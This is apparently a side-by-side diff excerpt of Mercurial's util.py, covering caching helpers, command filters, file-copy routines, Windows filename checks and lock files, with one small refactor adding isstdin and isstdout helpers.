1183 node.prev = head.prev
1183 node.prev = head.prev
1184 node.next = head
1184 node.next = head
1185 head.prev = node
1185 head.prev = node
1186 self._size += 1
1186 self._size += 1
1187 return node
1187 return node
1188
1188
1189 def lrucachefunc(func):
1189 def lrucachefunc(func):
1190 '''cache most recent results of function calls'''
1190 '''cache most recent results of function calls'''
1191 cache = {}
1191 cache = {}
1192 order = collections.deque()
1192 order = collections.deque()
1193 if func.__code__.co_argcount == 1:
1193 if func.__code__.co_argcount == 1:
1194 def f(arg):
1194 def f(arg):
1195 if arg not in cache:
1195 if arg not in cache:
1196 if len(cache) > 20:
1196 if len(cache) > 20:
1197 del cache[order.popleft()]
1197 del cache[order.popleft()]
1198 cache[arg] = func(arg)
1198 cache[arg] = func(arg)
1199 else:
1199 else:
1200 order.remove(arg)
1200 order.remove(arg)
1201 order.append(arg)
1201 order.append(arg)
1202 return cache[arg]
1202 return cache[arg]
1203 else:
1203 else:
1204 def f(*args):
1204 def f(*args):
1205 if args not in cache:
1205 if args not in cache:
1206 if len(cache) > 20:
1206 if len(cache) > 20:
1207 del cache[order.popleft()]
1207 del cache[order.popleft()]
1208 cache[args] = func(*args)
1208 cache[args] = func(*args)
1209 else:
1209 else:
1210 order.remove(args)
1210 order.remove(args)
1211 order.append(args)
1211 order.append(args)
1212 return cache[args]
1212 return cache[args]
1213
1213
1214 return f
1214 return f
1215
1215
1216 class propertycache(object):
1216 class propertycache(object):
1217 def __init__(self, func):
1217 def __init__(self, func):
1218 self.func = func
1218 self.func = func
1219 self.name = func.__name__
1219 self.name = func.__name__
1220 def __get__(self, obj, type=None):
1220 def __get__(self, obj, type=None):
1221 result = self.func(obj)
1221 result = self.func(obj)
1222 self.cachevalue(obj, result)
1222 self.cachevalue(obj, result)
1223 return result
1223 return result
1224
1224
1225 def cachevalue(self, obj, value):
1225 def cachevalue(self, obj, value):
1226 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1226 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1227 obj.__dict__[self.name] = value
1227 obj.__dict__[self.name] = value
1228
1228
1229 def clearcachedproperty(obj, prop):
1229 def clearcachedproperty(obj, prop):
1230 '''clear a cached property value, if one has been set'''
1230 '''clear a cached property value, if one has been set'''
1231 if prop in obj.__dict__:
1231 if prop in obj.__dict__:
1232 del obj.__dict__[prop]
1232 del obj.__dict__[prop]
1233
1233
1234 def pipefilter(s, cmd):
1234 def pipefilter(s, cmd):
1235 '''filter string S through command CMD, returning its output'''
1235 '''filter string S through command CMD, returning its output'''
1236 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1236 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1237 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
1237 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
1238 pout, perr = p.communicate(s)
1238 pout, perr = p.communicate(s)
1239 return pout
1239 return pout
1240
1240
1241 def tempfilter(s, cmd):
1241 def tempfilter(s, cmd):
1242 '''filter string S through a pair of temporary files with CMD.
1242 '''filter string S through a pair of temporary files with CMD.
1243 CMD is used as a template to create the real command to be run,
1243 CMD is used as a template to create the real command to be run,
1244 with the strings INFILE and OUTFILE replaced by the real names of
1244 with the strings INFILE and OUTFILE replaced by the real names of
1245 the temporary files generated.'''
1245 the temporary files generated.'''
1246 inname, outname = None, None
1246 inname, outname = None, None
1247 try:
1247 try:
1248 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
1248 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
1249 fp = os.fdopen(infd, pycompat.sysstr('wb'))
1249 fp = os.fdopen(infd, pycompat.sysstr('wb'))
1250 fp.write(s)
1250 fp.write(s)
1251 fp.close()
1251 fp.close()
1252 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
1252 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
1253 os.close(outfd)
1253 os.close(outfd)
1254 cmd = cmd.replace('INFILE', inname)
1254 cmd = cmd.replace('INFILE', inname)
1255 cmd = cmd.replace('OUTFILE', outname)
1255 cmd = cmd.replace('OUTFILE', outname)
1256 code = os.system(cmd)
1256 code = os.system(cmd)
1257 if pycompat.sysplatform == 'OpenVMS' and code & 1:
1257 if pycompat.sysplatform == 'OpenVMS' and code & 1:
1258 code = 0
1258 code = 0
1259 if code:
1259 if code:
1260 raise Abort(_("command '%s' failed: %s") %
1260 raise Abort(_("command '%s' failed: %s") %
1261 (cmd, explainexit(code)))
1261 (cmd, explainexit(code)))
1262 return readfile(outname)
1262 return readfile(outname)
1263 finally:
1263 finally:
1264 try:
1264 try:
1265 if inname:
1265 if inname:
1266 os.unlink(inname)
1266 os.unlink(inname)
1267 except OSError:
1267 except OSError:
1268 pass
1268 pass
1269 try:
1269 try:
1270 if outname:
1270 if outname:
1271 os.unlink(outname)
1271 os.unlink(outname)
1272 except OSError:
1272 except OSError:
1273 pass
1273 pass
1274
1274
1275 filtertable = {
1275 filtertable = {
1276 'tempfile:': tempfilter,
1276 'tempfile:': tempfilter,
1277 'pipe:': pipefilter,
1277 'pipe:': pipefilter,
1278 }
1278 }
1279
1279
1280 def filter(s, cmd):
1280 def filter(s, cmd):
1281 "filter a string through a command that transforms its input to its output"
1281 "filter a string through a command that transforms its input to its output"
1282 for name, fn in filtertable.iteritems():
1282 for name, fn in filtertable.iteritems():
1283 if cmd.startswith(name):
1283 if cmd.startswith(name):
1284 return fn(s, cmd[len(name):].lstrip())
1284 return fn(s, cmd[len(name):].lstrip())
1285 return pipefilter(s, cmd)
1285 return pipefilter(s, cmd)
1286
1286
1287 def binary(s):
1287 def binary(s):
1288 """return true if a string is binary data"""
1288 """return true if a string is binary data"""
1289 return bool(s and '\0' in s)
1289 return bool(s and '\0' in s)
1290
1290
1291 def increasingchunks(source, min=1024, max=65536):
1291 def increasingchunks(source, min=1024, max=65536):
1292 '''return no less than min bytes per chunk while data remains,
1292 '''return no less than min bytes per chunk while data remains,
1293 doubling min after each chunk until it reaches max'''
1293 doubling min after each chunk until it reaches max'''
1294 def log2(x):
1294 def log2(x):
1295 if not x:
1295 if not x:
1296 return 0
1296 return 0
1297 i = 0
1297 i = 0
1298 while x:
1298 while x:
1299 x >>= 1
1299 x >>= 1
1300 i += 1
1300 i += 1
1301 return i - 1
1301 return i - 1
1302
1302
1303 buf = []
1303 buf = []
1304 blen = 0
1304 blen = 0
1305 for chunk in source:
1305 for chunk in source:
1306 buf.append(chunk)
1306 buf.append(chunk)
1307 blen += len(chunk)
1307 blen += len(chunk)
1308 if blen >= min:
1308 if blen >= min:
1309 if min < max:
1309 if min < max:
1310 min = min << 1
1310 min = min << 1
1311 nmin = 1 << log2(blen)
1311 nmin = 1 << log2(blen)
1312 if nmin > min:
1312 if nmin > min:
1313 min = nmin
1313 min = nmin
1314 if min > max:
1314 if min > max:
1315 min = max
1315 min = max
1316 yield ''.join(buf)
1316 yield ''.join(buf)
1317 blen = 0
1317 blen = 0
1318 buf = []
1318 buf = []
1319 if buf:
1319 if buf:
1320 yield ''.join(buf)
1320 yield ''.join(buf)
1321
1321
1322 Abort = error.Abort
1322 Abort = error.Abort
1323
1323
1324 def always(fn):
1324 def always(fn):
1325 return True
1325 return True
1326
1326
1327 def never(fn):
1327 def never(fn):
1328 return False
1328 return False
1329
1329
1330 def nogc(func):
1330 def nogc(func):
1331 """disable garbage collector
1331 """disable garbage collector
1332
1332
1333 Python's garbage collector triggers a GC each time a certain number of
1333 Python's garbage collector triggers a GC each time a certain number of
1334 container objects (the number being defined by gc.get_threshold()) are
1334 container objects (the number being defined by gc.get_threshold()) are
1335 allocated even when marked not to be tracked by the collector. Tracking has
1335 allocated even when marked not to be tracked by the collector. Tracking has
1336 no effect on when GCs are triggered, only on what objects the GC looks
1336 no effect on when GCs are triggered, only on what objects the GC looks
1337 into. As a workaround, disable GC while building complex (huge)
1337 into. As a workaround, disable GC while building complex (huge)
1338 containers.
1338 containers.
1339
1339
1340 This garbage collector issue have been fixed in 2.7. But it still affect
1340 This garbage collector issue have been fixed in 2.7. But it still affect
1341 CPython's performance.
1341 CPython's performance.
1342 """
1342 """
1343 def wrapper(*args, **kwargs):
1343 def wrapper(*args, **kwargs):
1344 gcenabled = gc.isenabled()
1344 gcenabled = gc.isenabled()
1345 gc.disable()
1345 gc.disable()
1346 try:
1346 try:
1347 return func(*args, **kwargs)
1347 return func(*args, **kwargs)
1348 finally:
1348 finally:
1349 if gcenabled:
1349 if gcenabled:
1350 gc.enable()
1350 gc.enable()
1351 return wrapper
1351 return wrapper
1352
1352
1353 if pycompat.ispypy:
1353 if pycompat.ispypy:
1354 # PyPy runs slower with gc disabled
1354 # PyPy runs slower with gc disabled
1355 nogc = lambda x: x
1355 nogc = lambda x: x
1356
1356
1357 def pathto(root, n1, n2):
1357 def pathto(root, n1, n2):
1358 '''return the relative path from one place to another.
1358 '''return the relative path from one place to another.
1359 root should use os.sep to separate directories
1359 root should use os.sep to separate directories
1360 n1 should use os.sep to separate directories
1360 n1 should use os.sep to separate directories
1361 n2 should use "/" to separate directories
1361 n2 should use "/" to separate directories
1362 returns an os.sep-separated path.
1362 returns an os.sep-separated path.
1363
1363
1364 If n1 is a relative path, it's assumed it's
1364 If n1 is a relative path, it's assumed it's
1365 relative to root.
1365 relative to root.
1366 n2 should always be relative to root.
1366 n2 should always be relative to root.
1367 '''
1367 '''
1368 if not n1:
1368 if not n1:
1369 return localpath(n2)
1369 return localpath(n2)
1370 if os.path.isabs(n1):
1370 if os.path.isabs(n1):
1371 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1371 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1372 return os.path.join(root, localpath(n2))
1372 return os.path.join(root, localpath(n2))
1373 n2 = '/'.join((pconvert(root), n2))
1373 n2 = '/'.join((pconvert(root), n2))
1374 a, b = splitpath(n1), n2.split('/')
1374 a, b = splitpath(n1), n2.split('/')
1375 a.reverse()
1375 a.reverse()
1376 b.reverse()
1376 b.reverse()
1377 while a and b and a[-1] == b[-1]:
1377 while a and b and a[-1] == b[-1]:
1378 a.pop()
1378 a.pop()
1379 b.pop()
1379 b.pop()
1380 b.reverse()
1380 b.reverse()
1381 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1381 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1382
1382
1383 def mainfrozen():
1383 def mainfrozen():
1384 """return True if we are a frozen executable.
1384 """return True if we are a frozen executable.
1385
1385
1386 The code supports py2exe (most common, Windows only) and tools/freeze
1386 The code supports py2exe (most common, Windows only) and tools/freeze
1387 (portable, not much used).
1387 (portable, not much used).
1388 """
1388 """
1389 return (safehasattr(sys, "frozen") or # new py2exe
1389 return (safehasattr(sys, "frozen") or # new py2exe
1390 safehasattr(sys, "importers") or # old py2exe
1390 safehasattr(sys, "importers") or # old py2exe
1391 imp.is_frozen(u"__main__")) # tools/freeze
1391 imp.is_frozen(u"__main__")) # tools/freeze
1392
1392
1393 # the location of data files matching the source code
1393 # the location of data files matching the source code
1394 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1394 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1395 # executable version (py2exe) doesn't support __file__
1395 # executable version (py2exe) doesn't support __file__
1396 datapath = os.path.dirname(pycompat.sysexecutable)
1396 datapath = os.path.dirname(pycompat.sysexecutable)
1397 else:
1397 else:
1398 datapath = os.path.dirname(pycompat.fsencode(__file__))
1398 datapath = os.path.dirname(pycompat.fsencode(__file__))
1399
1399
1400 i18n.setdatapath(datapath)
1400 i18n.setdatapath(datapath)
1401
1401
1402 _hgexecutable = None
1402 _hgexecutable = None
1403
1403
1404 def hgexecutable():
1404 def hgexecutable():
1405 """return location of the 'hg' executable.
1405 """return location of the 'hg' executable.
1406
1406
1407 Defaults to $HG or 'hg' in the search path.
1407 Defaults to $HG or 'hg' in the search path.
1408 """
1408 """
1409 if _hgexecutable is None:
1409 if _hgexecutable is None:
1410 hg = encoding.environ.get('HG')
1410 hg = encoding.environ.get('HG')
1411 mainmod = sys.modules[pycompat.sysstr('__main__')]
1411 mainmod = sys.modules[pycompat.sysstr('__main__')]
1412 if hg:
1412 if hg:
1413 _sethgexecutable(hg)
1413 _sethgexecutable(hg)
1414 elif mainfrozen():
1414 elif mainfrozen():
1415 if getattr(sys, 'frozen', None) == 'macosx_app':
1415 if getattr(sys, 'frozen', None) == 'macosx_app':
1416 # Env variable set by py2app
1416 # Env variable set by py2app
1417 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1417 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1418 else:
1418 else:
1419 _sethgexecutable(pycompat.sysexecutable)
1419 _sethgexecutable(pycompat.sysexecutable)
1420 elif (os.path.basename(
1420 elif (os.path.basename(
1421 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1421 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1422 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1422 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1423 else:
1423 else:
1424 exe = findexe('hg') or os.path.basename(sys.argv[0])
1424 exe = findexe('hg') or os.path.basename(sys.argv[0])
1425 _sethgexecutable(exe)
1425 _sethgexecutable(exe)
1426 return _hgexecutable
1426 return _hgexecutable
1427
1427
1428 def _sethgexecutable(path):
1428 def _sethgexecutable(path):
1429 """set location of the 'hg' executable"""
1429 """set location of the 'hg' executable"""
1430 global _hgexecutable
1430 global _hgexecutable
1431 _hgexecutable = path
1431 _hgexecutable = path
1432
1432
1433 def _isstdout(f):
1433 def _testfileno(f, stdf):
1434 fileno = getattr(f, 'fileno', None)
1434 fileno = getattr(f, 'fileno', None)
1435 try:
1435 try:
1436 return fileno and fileno() == sys.__stdout__.fileno()
1436 return fileno and fileno() == stdf.fileno()
1437 except io.UnsupportedOperation:
1437 except io.UnsupportedOperation:
1438 return False # fileno() raised UnsupportedOperation
1438 return False # fileno() raised UnsupportedOperation
1439
1439
1440 def isstdin(f):
1441 return _testfileno(f, sys.__stdin__)
1442
1443 def isstdout(f):
1444 return _testfileno(f, sys.__stdout__)
1445
1440 def shellenviron(environ=None):
1446 def shellenviron(environ=None):
1441 """return environ with optional override, useful for shelling out"""
1447 """return environ with optional override, useful for shelling out"""
1442 def py2shell(val):
1448 def py2shell(val):
1443 'convert python object into string that is useful to shell'
1449 'convert python object into string that is useful to shell'
1444 if val is None or val is False:
1450 if val is None or val is False:
1445 return '0'
1451 return '0'
1446 if val is True:
1452 if val is True:
1447 return '1'
1453 return '1'
1448 return pycompat.bytestr(val)
1454 return pycompat.bytestr(val)
1449 env = dict(encoding.environ)
1455 env = dict(encoding.environ)
1450 if environ:
1456 if environ:
1451 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1457 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1452 env['HG'] = hgexecutable()
1458 env['HG'] = hgexecutable()
1453 return env
1459 return env
1454
1460
1455 def system(cmd, environ=None, cwd=None, out=None):
1461 def system(cmd, environ=None, cwd=None, out=None):
1456 '''enhanced shell command execution.
1462 '''enhanced shell command execution.
1457 run with environment maybe modified, maybe in different dir.
1463 run with environment maybe modified, maybe in different dir.
1458
1464
1459 if out is specified, it is assumed to be a file-like object that has a
1465 if out is specified, it is assumed to be a file-like object that has a
1460 write() method. stdout and stderr will be redirected to out.'''
1466 write() method. stdout and stderr will be redirected to out.'''
1461 try:
1467 try:
1462 stdout.flush()
1468 stdout.flush()
1463 except Exception:
1469 except Exception:
1464 pass
1470 pass
1465 cmd = quotecommand(cmd)
1471 cmd = quotecommand(cmd)
1466 env = shellenviron(environ)
1472 env = shellenviron(environ)
1467 if out is None or _isstdout(out):
1473 if out is None or isstdout(out):
1468 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1474 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1469 env=env, cwd=cwd)
1475 env=env, cwd=cwd)
1470 else:
1476 else:
1471 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1477 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1472 env=env, cwd=cwd, stdout=subprocess.PIPE,
1478 env=env, cwd=cwd, stdout=subprocess.PIPE,
1473 stderr=subprocess.STDOUT)
1479 stderr=subprocess.STDOUT)
1474 for line in iter(proc.stdout.readline, ''):
1480 for line in iter(proc.stdout.readline, ''):
1475 out.write(line)
1481 out.write(line)
1476 proc.wait()
1482 proc.wait()
1477 rc = proc.returncode
1483 rc = proc.returncode
1478 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1484 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1479 rc = 0
1485 rc = 0
1480 return rc
1486 return rc
1481
1487
1482 def checksignature(func):
1488 def checksignature(func):
1483 '''wrap a function with code to check for calling errors'''
1489 '''wrap a function with code to check for calling errors'''
1484 def check(*args, **kwargs):
1490 def check(*args, **kwargs):
1485 try:
1491 try:
1486 return func(*args, **kwargs)
1492 return func(*args, **kwargs)
1487 except TypeError:
1493 except TypeError:
1488 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1494 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1489 raise error.SignatureError
1495 raise error.SignatureError
1490 raise
1496 raise
1491
1497
1492 return check
1498 return check
1493
1499
1494 # a whilelist of known filesystems where hardlink works reliably
1500 # a whilelist of known filesystems where hardlink works reliably
1495 _hardlinkfswhitelist = {
1501 _hardlinkfswhitelist = {
1496 'btrfs',
1502 'btrfs',
1497 'ext2',
1503 'ext2',
1498 'ext3',
1504 'ext3',
1499 'ext4',
1505 'ext4',
1500 'hfs',
1506 'hfs',
1501 'jfs',
1507 'jfs',
1502 'NTFS',
1508 'NTFS',
1503 'reiserfs',
1509 'reiserfs',
1504 'tmpfs',
1510 'tmpfs',
1505 'ufs',
1511 'ufs',
1506 'xfs',
1512 'xfs',
1507 'zfs',
1513 'zfs',
1508 }
1514 }
1509
1515
1510 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1516 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1511 '''copy a file, preserving mode and optionally other stat info like
1517 '''copy a file, preserving mode and optionally other stat info like
1512 atime/mtime
1518 atime/mtime
1513
1519
1514 checkambig argument is used with filestat, and is useful only if
1520 checkambig argument is used with filestat, and is useful only if
1515 destination file is guarded by any lock (e.g. repo.lock or
1521 destination file is guarded by any lock (e.g. repo.lock or
1516 repo.wlock).
1522 repo.wlock).
1517
1523
1518 copystat and checkambig should be exclusive.
1524 copystat and checkambig should be exclusive.
1519 '''
1525 '''
1520 assert not (copystat and checkambig)
1526 assert not (copystat and checkambig)
1521 oldstat = None
1527 oldstat = None
1522 if os.path.lexists(dest):
1528 if os.path.lexists(dest):
1523 if checkambig:
1529 if checkambig:
1524 oldstat = checkambig and filestat.frompath(dest)
1530 oldstat = checkambig and filestat.frompath(dest)
1525 unlink(dest)
1531 unlink(dest)
1526 if hardlink:
1532 if hardlink:
1527 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1533 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1528 # unless we are confident that dest is on a whitelisted filesystem.
1534 # unless we are confident that dest is on a whitelisted filesystem.
1529 try:
1535 try:
1530 fstype = getfstype(os.path.dirname(dest))
1536 fstype = getfstype(os.path.dirname(dest))
1531 except OSError:
1537 except OSError:
1532 fstype = None
1538 fstype = None
1533 if fstype not in _hardlinkfswhitelist:
1539 if fstype not in _hardlinkfswhitelist:
1534 hardlink = False
1540 hardlink = False
1535 if hardlink:
1541 if hardlink:
1536 try:
1542 try:
1537 oslink(src, dest)
1543 oslink(src, dest)
1538 return
1544 return
1539 except (IOError, OSError):
1545 except (IOError, OSError):
1540 pass # fall back to normal copy
1546 pass # fall back to normal copy
1541 if os.path.islink(src):
1547 if os.path.islink(src):
1542 os.symlink(os.readlink(src), dest)
1548 os.symlink(os.readlink(src), dest)
1543 # copytime is ignored for symlinks, but in general copytime isn't needed
1549 # copytime is ignored for symlinks, but in general copytime isn't needed
1544 # for them anyway
1550 # for them anyway
1545 else:
1551 else:
1546 try:
1552 try:
1547 shutil.copyfile(src, dest)
1553 shutil.copyfile(src, dest)
1548 if copystat:
1554 if copystat:
1549 # copystat also copies mode
1555 # copystat also copies mode
1550 shutil.copystat(src, dest)
1556 shutil.copystat(src, dest)
1551 else:
1557 else:
1552 shutil.copymode(src, dest)
1558 shutil.copymode(src, dest)
1553 if oldstat and oldstat.stat:
1559 if oldstat and oldstat.stat:
1554 newstat = filestat.frompath(dest)
1560 newstat = filestat.frompath(dest)
1555 if newstat.isambig(oldstat):
1561 if newstat.isambig(oldstat):
1556 # stat of copied file is ambiguous to original one
1562 # stat of copied file is ambiguous to original one
1557 advanced = (
1563 advanced = (
1558 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1564 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1559 os.utime(dest, (advanced, advanced))
1565 os.utime(dest, (advanced, advanced))
1560 except shutil.Error as inst:
1566 except shutil.Error as inst:
1561 raise Abort(str(inst))
1567 raise Abort(str(inst))
1562
1568
1563 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1569 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1564 """Copy a directory tree using hardlinks if possible."""
1570 """Copy a directory tree using hardlinks if possible."""
1565 num = 0
1571 num = 0
1566
1572
1567 gettopic = lambda: hardlink and _('linking') or _('copying')
1573 gettopic = lambda: hardlink and _('linking') or _('copying')
1568
1574
1569 if os.path.isdir(src):
1575 if os.path.isdir(src):
1570 if hardlink is None:
1576 if hardlink is None:
1571 hardlink = (os.stat(src).st_dev ==
1577 hardlink = (os.stat(src).st_dev ==
1572 os.stat(os.path.dirname(dst)).st_dev)
1578 os.stat(os.path.dirname(dst)).st_dev)
1573 topic = gettopic()
1579 topic = gettopic()
1574 os.mkdir(dst)
1580 os.mkdir(dst)
1575 for name, kind in listdir(src):
1581 for name, kind in listdir(src):
1576 srcname = os.path.join(src, name)
1582 srcname = os.path.join(src, name)
1577 dstname = os.path.join(dst, name)
1583 dstname = os.path.join(dst, name)
1578 def nprog(t, pos):
1584 def nprog(t, pos):
1579 if pos is not None:
1585 if pos is not None:
1580 return progress(t, pos + num)
1586 return progress(t, pos + num)
1581 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1587 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1582 num += n
1588 num += n
1583 else:
1589 else:
1584 if hardlink is None:
1590 if hardlink is None:
1585 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1591 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1586 os.stat(os.path.dirname(dst)).st_dev)
1592 os.stat(os.path.dirname(dst)).st_dev)
1587 topic = gettopic()
1593 topic = gettopic()
1588
1594
1589 if hardlink:
1595 if hardlink:
1590 try:
1596 try:
1591 oslink(src, dst)
1597 oslink(src, dst)
1592 except (IOError, OSError):
1598 except (IOError, OSError):
1593 hardlink = False
1599 hardlink = False
1594 shutil.copy(src, dst)
1600 shutil.copy(src, dst)
1595 else:
1601 else:
1596 shutil.copy(src, dst)
1602 shutil.copy(src, dst)
1597 num += 1
1603 num += 1
1598 progress(topic, num)
1604 progress(topic, num)
1599 progress(topic, None)
1605 progress(topic, None)
1600
1606
1601 return hardlink, num
1607 return hardlink, num
1602
1608
1603 _winreservednames = {
1609 _winreservednames = {
1604 'con', 'prn', 'aux', 'nul',
1610 'con', 'prn', 'aux', 'nul',
1605 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1611 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1606 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1612 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1607 }
1613 }
1608 _winreservedchars = ':*?"<>|'
1614 _winreservedchars = ':*?"<>|'
1609 def checkwinfilename(path):
1615 def checkwinfilename(path):
1610 r'''Check that the base-relative path is a valid filename on Windows.
1616 r'''Check that the base-relative path is a valid filename on Windows.
1611 Returns None if the path is ok, or a UI string describing the problem.
1617 Returns None if the path is ok, or a UI string describing the problem.
1612
1618
1613 >>> checkwinfilename(b"just/a/normal/path")
1619 >>> checkwinfilename(b"just/a/normal/path")
1614 >>> checkwinfilename(b"foo/bar/con.xml")
1620 >>> checkwinfilename(b"foo/bar/con.xml")
1615 "filename contains 'con', which is reserved on Windows"
1621 "filename contains 'con', which is reserved on Windows"
1616 >>> checkwinfilename(b"foo/con.xml/bar")
1622 >>> checkwinfilename(b"foo/con.xml/bar")
1617 "filename contains 'con', which is reserved on Windows"
1623 "filename contains 'con', which is reserved on Windows"
1618 >>> checkwinfilename(b"foo/bar/xml.con")
1624 >>> checkwinfilename(b"foo/bar/xml.con")
1619 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1625 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1620 "filename contains 'AUX', which is reserved on Windows"
1626 "filename contains 'AUX', which is reserved on Windows"
1621 >>> checkwinfilename(b"foo/bar/bla:.txt")
1627 >>> checkwinfilename(b"foo/bar/bla:.txt")
1622 "filename contains ':', which is reserved on Windows"
1628 "filename contains ':', which is reserved on Windows"
1623 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1629 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1624 "filename contains '\\x07', which is invalid on Windows"
1630 "filename contains '\\x07', which is invalid on Windows"
1625 >>> checkwinfilename(b"foo/bar/bla ")
1631 >>> checkwinfilename(b"foo/bar/bla ")
1626 "filename ends with ' ', which is not allowed on Windows"
1632 "filename ends with ' ', which is not allowed on Windows"
1627 >>> checkwinfilename(b"../bar")
1633 >>> checkwinfilename(b"../bar")
1628 >>> checkwinfilename(b"foo\\")
1634 >>> checkwinfilename(b"foo\\")
1629 "filename ends with '\\', which is invalid on Windows"
1635 "filename ends with '\\', which is invalid on Windows"
1630 >>> checkwinfilename(b"foo\\/bar")
1636 >>> checkwinfilename(b"foo\\/bar")
1631 "directory name ends with '\\', which is invalid on Windows"
1637 "directory name ends with '\\', which is invalid on Windows"
1632 '''
1638 '''
1633 if path.endswith('\\'):
1639 if path.endswith('\\'):
1634 return _("filename ends with '\\', which is invalid on Windows")
1640 return _("filename ends with '\\', which is invalid on Windows")
1635 if '\\/' in path:
1641 if '\\/' in path:
1636 return _("directory name ends with '\\', which is invalid on Windows")
1642 return _("directory name ends with '\\', which is invalid on Windows")
1637 for n in path.replace('\\', '/').split('/'):
1643 for n in path.replace('\\', '/').split('/'):
1638 if not n:
1644 if not n:
1639 continue
1645 continue
1640 for c in _filenamebytestr(n):
1646 for c in _filenamebytestr(n):
1641 if c in _winreservedchars:
1647 if c in _winreservedchars:
1642 return _("filename contains '%s', which is reserved "
1648 return _("filename contains '%s', which is reserved "
1643 "on Windows") % c
1649 "on Windows") % c
1644 if ord(c) <= 31:
1650 if ord(c) <= 31:
1645 return _("filename contains '%s', which is invalid "
1651 return _("filename contains '%s', which is invalid "
1646 "on Windows") % escapestr(c)
1652 "on Windows") % escapestr(c)
1647 base = n.split('.')[0]
1653 base = n.split('.')[0]
1648 if base and base.lower() in _winreservednames:
1654 if base and base.lower() in _winreservednames:
1649 return _("filename contains '%s', which is reserved "
1655 return _("filename contains '%s', which is reserved "
1650 "on Windows") % base
1656 "on Windows") % base
1651 t = n[-1:]
1657 t = n[-1:]
1652 if t in '. ' and n not in '..':
1658 if t in '. ' and n not in '..':
1653 return _("filename ends with '%s', which is not allowed "
1659 return _("filename ends with '%s', which is not allowed "
1654 "on Windows") % t
1660 "on Windows") % t
1655
1661
1656 if pycompat.iswindows:
1662 if pycompat.iswindows:
1657 checkosfilename = checkwinfilename
1663 checkosfilename = checkwinfilename
1658 timer = time.clock
1664 timer = time.clock
1659 else:
1665 else:
1660 checkosfilename = platform.checkosfilename
1666 checkosfilename = platform.checkosfilename
1661 timer = time.time
1667 timer = time.time
1662
1668
1663 if safehasattr(time, "perf_counter"):
1669 if safehasattr(time, "perf_counter"):
1664 timer = time.perf_counter
1670 timer = time.perf_counter
1665
1671
1666 def makelock(info, pathname):
1672 def makelock(info, pathname):
1667 """Create a lock file atomically if possible
1673 """Create a lock file atomically if possible
1668
1674
1669 This may leave a stale lock file if symlink isn't supported and signal
1675 This may leave a stale lock file if symlink isn't supported and signal
1670 interrupt is enabled.
1676 interrupt is enabled.
1671 """
1677 """
1672 try:
1678 try:
1673 return os.symlink(info, pathname)
1679 return os.symlink(info, pathname)
1674 except OSError as why:
1680 except OSError as why:
1675 if why.errno == errno.EEXIST:
1681 if why.errno == errno.EEXIST:
1676 raise
1682 raise
1677 except AttributeError: # no symlink in os
1683 except AttributeError: # no symlink in os
1678 pass
1684 pass
1679
1685
1680 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1686 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1681 ld = os.open(pathname, flags)
1687 ld = os.open(pathname, flags)
1682 os.write(ld, info)
1688 os.write(ld, info)
1683 os.close(ld)
1689 os.close(ld)
1684
1690
1685 def readlock(pathname):
1691 def readlock(pathname):
1686 try:
1692 try:
1687 return os.readlink(pathname)
1693 return os.readlink(pathname)
1688 except OSError as why:
1694 except OSError as why:
1689 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1695 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1690 raise
1696 raise
